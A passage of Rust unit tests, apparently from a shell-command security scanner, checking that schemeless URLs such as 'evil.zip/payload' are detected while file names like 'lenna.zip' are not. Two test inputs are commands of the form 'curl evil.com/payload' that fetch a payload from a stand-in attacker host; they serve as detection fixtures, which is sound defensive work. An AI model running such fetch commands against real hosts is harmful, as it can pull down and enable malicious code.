1287 "-Ooutput.html should not be detected as schemeless URL"
1288 );
1289 }
1290
1291 #[test]
1292 fn test_schemeless_real_domain_still_detected() {
1293 let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
1294 let schemeless: Vec<_> = urls
1295 .iter()
1296 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1297 .collect();
1298 assert!(
1299 !schemeless.is_empty(),
1300 "evil.com/payload should be detected as schemeless URL"
1301 );
1302 }
1303
1304 #[test]
1305 fn test_schemeless_png_no_slash_is_file() {
1306 assert!(!looks_like_schemeless_host("lenna.png"));
1307 }
1308
1309 #[test]
1310 fn test_schemeless_tld_overlap_with_path_is_domain() {
1311 assert!(looks_like_schemeless_host("evil.zip/payload"));
1314 assert!(looks_like_schemeless_host("evil.sh/payload"));
1315 }
1316
1317 #[test]
1318 fn test_schemeless_tld_overlap_without_path_is_file() {
1319 assert!(!looks_like_schemeless_host("lenna.zip"));
1321 assert!(!looks_like_schemeless_host("script.sh"));
1322 }
1323
1324 #[test]
1325 fn test_schemeless_tld_overlap_sink_context_detected() {
1326 let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
1328 let schemeless: Vec<_> = urls
1329 .iter()
1330 .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1331 .collect();
1332 assert!(
1333 !schemeless.is_empty(),
1334 "evil.zip/payload should be detected as schemeless URL in sink context"
1335 );
1336 }
1337}